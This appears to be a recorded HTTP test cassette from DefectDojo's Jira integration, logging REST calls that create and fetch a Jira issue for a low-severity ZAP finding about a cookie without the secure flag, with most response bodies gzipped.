https://defectdojo.atlassian.net/rest/api/2/issue/createmeta?projectKeys=NTEST&issuetypeNames=Task&expand=projects.issuetypes.fields + response: + body: + string: !!binary | + H4sIAAAAAAAAA+xWS0/jMBD+K1EOnCpCS8WiShVCy66EdoWQKFwQB5NMqKljBz/adBH/fT2JE7vQ + ZbPlsgd6qWcyj28envFzDFVJeBZP4lKKR0i1igf+OLl99gJUKQN6XQKKKGC55c21LtUkSTLIrUIm + HsU+0YwoRQnf56ATCUonpKTJKHFWk+GB/VkTFI22xALWlrqYfbuaWYqTAix5zanW1gA6JEuiibyW + zKJ6jsfH1fi4j38FqZHQ+m6MnJQ0m9aO9xrGOZLjgy/WzWhcjcY7G1b0F0xVQRjbU+7/HV/Do2p4 + 9DFfVevMHd7xdjiqDkcf81ZARk1hvbnDH729DMJuwS7aoV86C3XHjMKOQSIDlUpaaiq45Z5GdQIG + UUaVpjzVUUkhhUjk0UrIxT5qp4Lb/umDwqVgSWG1Jf4g2MPhsSNnFui0g+x7eEbUwlKGa0m4YkRD + drHxRZl7jadJTpiCgb9vOQWWYeu7g217ZYqCyDUeJTwZKsEKammsmkrnUBD8UvufxEpLyh/QwVpp + KJDjtF86cFeO096/VmIQz4k6g5wYpm8IM9ChEyVIgjnHstqq6vguLHYvZGGWOnCe6eGdIy/CzHYI + Q91eGO/s6GBMrCCrhT67cVvPtTbiSW3kBWuaiqIUHDiugbCoTuVNVYmUBDuH2npaFa8fVjkw6sv8 + 1TPbMgdyPesckyxDT4D+JBRiCfGW2mNkRGuSzguEtlNkgX4QWsD1oZ2Gok1oG9q9QkPMG/3VB/Tb + 6x+a8AjPAm4LMZTsibEbBW5t9BoErWwAsmV5gJedUAPOK/0DsLeNsNMQ+NgTxmnj3fzRjFuR6xWR + 9RykRcmonfS+pJ8vnm2+/tcXTz0z64nLKF/sODMD/derseH6a/HT0pBF9Yr0c3PDADFa4GxloKHn + qnm98JKSpguQJzY/0k4sdxdt1HtqLlZX5h4XyiXBb1O85CFbNRynWgO1bT/lxlbtyYBcT3vfYZzt + mN+cVjcgVcPeJcHLRjvMbmjTp/c7rSIn7LMbivaF3iykZjn9ZS3ZMjxwgH6RGQUyDKPTDpZPy+pW + j2ds9sZvAAAA//+8l81uwjAMx19l6p1kHeUyaeI0aQf2CGgKKEoyAUVNGezQd5+dL1rSTe1ScXUT + +5fG8d8emxsYnFpvbLPj8IBYtZVL94BeTA0ce8dXAVFlpeqbJve33xBWdzTE2doiEpZ5FQmGCM+q + VQ9dfG//VBEbm+aYmcP7QLVngmuKO7R3osAglZDgnegv1Ht34jdrxAhGpOBnpMGalnca2JjUYz4l + Y86nwbT1vgv6bmwedZ6MWkyDChnZ5VyVZw9ZJEMuJoOMUnRlbB51kTVr7HPbLzEN/Z6pAKVme9J1 + uTfD+gf0CHkxrIKxAxYhuzkzkw85fl+UJqLi/CDLI9Qh8qkq9izkjIMez1DfwxY7tEG0a7F7hUUP + 2B9kYZyK0HrK3p9Vecc23DaiA050I7rxKOK8tboZa/C87nuaTOXkkVpHVJ8EXG29HClJfSNlg53e + uvkBAAD//wMAc91BljkVAAA= + headers: + ATL-TraceId: + - f4b4d81d2dd4514b + Connection: + - keep-alive + Content-Type: + - application/json;charset=UTF-8 + Date: + - Mon, 01 Mar 2021 19:45:19 GMT + Expect-CT: + - report-uri="https://web-security-reports.services.atlassian.com/expect-ct-report/global-proxy", + enforce, max-age=86400 + Server: + - AtlassianProxy/1.15.8.1 + Strict-Transport-Security: + - max-age=315360000; includeSubDomains; preload + Transfer-Encoding: + - chunked + X-Content-Type-Options: + - nosniff + X-XSS-Protection: + - 1; mode=block + cache-control: + - no-cache, no-store, no-transform + content-encoding: + - gzip + micros-issuer: + - micros/edge-authenticator + timing-allow-origin: + - '*' + vary: + - Accept-Encoding + x-aaccountid: + - 5fa43d1b8405b10077912260 + x-arequestid: + - 558180df-c326-4e53-931e-cc92af652fac + x-envoy-upstream-service-time: + - '60' + status: + code: 200 + message: OK +- request: + body: '{"fields": {"project": {"key": "NTEST"}, "summary": "Zap2: Cookie Without + Secure Flag", "description": "\n\n\n\n\n\n*Title*: [Zap2: Cookie Without Secure + Flag|http://localhost:8080/finding/390]\n\n*Defect Dojo link:* http://localhost:8080/finding/390\n\n*Severity:* + Low \n\n*CWE:* Unknown\n\n\n\n*CVE:* Unknown\n\n\n*Product/Engagement/Test:* + [Security How-to|http://localhost:8080/product/2] / [weekly engagement|http://localhost:8080/engagement/3] + / [ZAP Scan|http://localhost:8080/test/113]\n\n*Branch/Tag:* None\n\n*BuildID:* + None\n\n*Commit hash:* None\n\n*Systems/Endpoints*: \n\n* https://mainsite.com:443\n* + https://mainsite.com\n* https://mainsite.com/dashboard\n\n*Description*:\nA + cookie has been set without the secure flag, which means that the cookie can + be accessed via unencrypted connections.\n\nReference: http://www.owasp.org/index.php/Testing_for_cookies_attributes_(OWASP-SM-002)\n\nURL: + https://mainsite.com/dashboard\nMethod: GET\nParameter: opvc\nEvidence: Set-Cookie: + opvc\n\nURL: https://mainsite.com/dashboard\nMethod: GET\nParameter: dmid\nEvidence: + Set-Cookie: dmid\n\nURL: https://mainsite.com\nMethod: GET\nParameter: sitevisitscookie\nEvidence: + Set-Cookie: sitevisitscookie\n\n\n*Mitigation*:\nWhenever a cookie contains + sensitive information or is a session token, then it should always be passed + using an encrypted channel. Ensure that the secure flag is set for cookies containing + such sensitive information.\n\n*Impact*:\nNo impact provided\n\n*Steps to reproduce*:\nNone\n\n*References*:\nCWE-614\nWASC-13\n\n\n*Defect + Dojo ID:* 390\n\n*Reporter:* [(admin) ()|mailto:]\n", "issuetype": {"name": + "Task"}, "priority": {"name": "Low"}}}' + headers: + Accept: + - application/json,*.*;q=0.9 + Accept-Encoding: + - gzip, deflate + Cache-Control: + - no-cache + Connection: + - keep-alive + Content-Length: + - '1673' + Content-Type: + - application/json + User-Agent: + - python-requests/2.25.1 + method: POST + uri: https://defectdojo.atlassian.net/rest/api/2/issue + response: + body: + string: '{"id":"10616","key":"NTEST-464","self":"https://defectdojo.atlassian.net/rest/api/2/issue/10616"}' + headers: + ATL-TraceId: + - 8da2b2ba91f6a740 + Connection: + - keep-alive + Content-Type: + - application/json;charset=UTF-8 + Date: + - Mon, 01 Mar 2021 19:45:19 GMT + Expect-CT: + - report-uri="https://web-security-reports.services.atlassian.com/expect-ct-report/global-proxy", + enforce, max-age=86400 + Server: + - AtlassianProxy/1.15.8.1 + Strict-Transport-Security: + - max-age=315360000; includeSubDomains; preload + Transfer-Encoding: + - chunked + X-Content-Type-Options: + - nosniff + X-XSS-Protection: + - 1; mode=block + cache-control: + - no-cache, no-store, no-transform + micros-issuer: + - micros/edge-authenticator + timing-allow-origin: + - '*' + x-aaccountid: + - 5fa43d1b8405b10077912260 + x-arequestid: + - eb32b4c1-b73f-4238-afce-f726dff6d265 + x-envoy-upstream-service-time: + - '414' + status: + code: 201 + message: Created +- request: + body: null + headers: + Accept: + - application/json,*.*;q=0.9 + Accept-Encoding: + - gzip, deflate + Cache-Control: + - no-cache + Connection: + - keep-alive + Content-Type: + - application/json + User-Agent: + - python-requests/2.25.1 + method: GET + uri: https://defectdojo.atlassian.net/rest/api/2/issue/NTEST-464 + response: + body: + string: !!binary | + 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 + headers: + ATL-TraceId: + - 1485133a4244efd0 + Connection: + - keep-alive + Content-Type: + - application/json;charset=UTF-8 + Date: + - Mon, 01 Mar 2021 19:45:20 GMT + Expect-CT: + - report-uri="https://web-security-reports.services.atlassian.com/expect-ct-report/global-proxy", + enforce, max-age=86400 + Server: + - AtlassianProxy/1.15.8.1 + Strict-Transport-Security: + - max-age=315360000; includeSubDomains; preload + Transfer-Encoding: + - chunked + X-Content-Type-Options: + - nosniff + X-XSS-Protection: + - 1; mode=block + cache-control: + - no-cache, no-store, no-transform + content-encoding: + - gzip + micros-issuer: + - micros/edge-authenticator + timing-allow-origin: + - '*' + vary: + - Accept-Encoding + x-aaccountid: + - 5fa43d1b8405b10077912260 + x-arequestid: + - 9c0e66bc-8560-427b-ba90-8c1f67ee9ab6 + x-envoy-upstream-service-time: + - '167' + status: + code: 200 + message: OK +- request: + body: null + headers: + Accept: + - application/json,*.*;q=0.9 + Accept-Encoding: + - gzip, deflate + Cache-Control: + - no-cache + Connection: + - keep-alive + Content-Type: + - application/json + User-Agent: + - python-requests/2.25.1 + method: GET + uri: https://defectdojo.atlassian.net/rest/api/2/issue/10616 + response: + body: + string: !!binary | + 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 + headers: + ATL-TraceId: + - 48a5c1eeb36f395e + Connection: + - keep-alive + Content-Type: + - application/json;charset=UTF-8 + Date: + - Mon, 01 Mar 2021 19:45:20 GMT + Expect-CT: + - report-uri="https://web-security-reports.services.atlassian.com/expect-ct-report/global-proxy", + enforce, max-age=86400 + Server: + - AtlassianProxy/1.15.8.1 + Strict-Transport-Security: + - max-age=315360000; includeSubDomains; preload + Transfer-Encoding: + - chunked + X-Content-Type-Options: + - nosniff + X-XSS-Protection: + - 1; mode=block + cache-control: + - no-cache, no-store, no-transform + content-encoding: + - gzip + micros-issuer: + - micros/edge-authenticator + timing-allow-origin: + - '*' + vary: + - Accept-Encoding + x-aaccountid: + - 5fa43d1b8405b10077912260 + x-arequestid: + - 5313973c-b0d3-493a-b8f9-e0030fab6a38 + x-envoy-upstream-service-time: + - '183' + status: + code: 200 + message: OK +- request: + body: '{"issueKeys": ["10616"], "ignoreEpics": true}' + headers: + Accept: + - application/json,*.*;q=0.9 + Accept-Encoding: + - gzip, deflate + Cache-Control: + - no-cache + Connection: + - keep-alive + Content-Length: + - '45' + Content-Type: + - application/json + User-Agent: + - python-requests/2.25.1 + method: PUT + uri: https://defectdojo.atlassian.net/rest/greenhopper/1.0/epics/10614/add + response: + body: + string: '' + headers: + ATL-TraceId: + - 7ee0ce5f772f2c94 + Connection: + - keep-alive + Content-Type: + - application/json;charset=UTF-8 + Date: + - Mon, 01 Mar 2021 19:45:20 GMT + Expect-CT: + - report-uri="https://web-security-reports.services.atlassian.com/expect-ct-report/global-proxy", + enforce, max-age=86400 + Server: + - AtlassianProxy/1.15.8.1 + Strict-Transport-Security: + - max-age=315360000; includeSubDomains; preload + X-Content-Type-Options: + - nosniff + X-XSS-Protection: + - 1; mode=block + cache-control: + - no-cache, no-store, no-transform + micros-issuer: + - micros/edge-authenticator + timing-allow-origin: + - '*' + x-aaccountid: + - 5fa43d1b8405b10077912260 + x-arequestid: + - c42f5ff9-8b7e-45f6-8421-40a022211528 + x-envoy-upstream-service-time: + - '193' + status: + code: 204 + message: No Content +- request: + body: null + headers: + Accept: + - application/json,*.*;q=0.9 + Accept-Encoding: + - gzip, deflate + Cache-Control: + - no-cache + Connection: + - keep-alive + Content-Type: + - application/json + User-Agent: + - python-requests/2.25.1 + method: GET + uri: https://defectdojo.atlassian.net/rest/api/2/serverInfo + response: + body: + string: !!binary | + H4sIAAAAAAAAA0yPQUvEMBCF/0uutt1JmnS3uYkeVGQV2j2JSNpOsJImpUmFZdn/boKL623em+/N + Y06kUx4PiyGSfIYwe7nZDKixD4P7coUKRnk/KltYDCQj37j40dkIUwBaQAF5s799bR5e2ut2v05d + nIh8S1AGGbxnZMDZuOOENrTHGeOBO+PWIYa6dTTDb4TIFBD8Yt6rkEAGjObAcla1lEq2lSUvAOAG + IhzzHpfY247TlS1zoC0DyYVkkS3pH9tPj1a7CPJKiK2mWiPyXV1rxZNGRbesEjsWBRN9XdX/CoJJ + DU/jokh6R6vVhGfXq2SfiLlMBO3HoSHn8w8AAAD//wMAGD6lkloBAAA= + headers: + ATL-TraceId: + - 9855afc45fac5907 + Connection: + - keep-alive + Content-Type: + - application/json;charset=UTF-8 + Date: + - Mon, 01 Mar 2021 19:45:24 GMT + Expect-CT: + - report-uri="https://web-security-reports.services.atlassian.com/expect-ct-report/global-proxy", + enforce, max-age=86400 + Server: + - AtlassianProxy/1.15.8.1 + Strict-Transport-Security: + - max-age=315360000; includeSubDomains; preload + Transfer-Encoding: + - chunked + X-Content-Type-Options: + - nosniff + X-XSS-Protection: + - 1; mode=block + cache-control: + - no-cache, no-store, no-transform + content-encoding: + - gzip + micros-issuer: + - micros/edge-authenticator + timing-allow-origin: + - '*' + vary: + - Accept-Encoding + x-aaccountid: + - 5fa43d1b8405b10077912260 + x-arequestid: + - 28c2c325-1ff2-4439-8f44-36994d106220 + x-envoy-upstream-service-time: + - '30' + status: + code: 200 + message: OK +- request: + body: null + headers: + Accept: + - application/json,*.*;q=0.9 + Accept-Encoding: + - gzip, deflate + Cache-Control: + - no-cache + Connection: + - keep-alive + Content-Type: + - application/json + User-Agent: + - python-requests/2.25.1 + method: GET + uri: https://defectdojo.atlassian.net/rest/api/2/field + response: + body: + string: !!binary | + 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 + 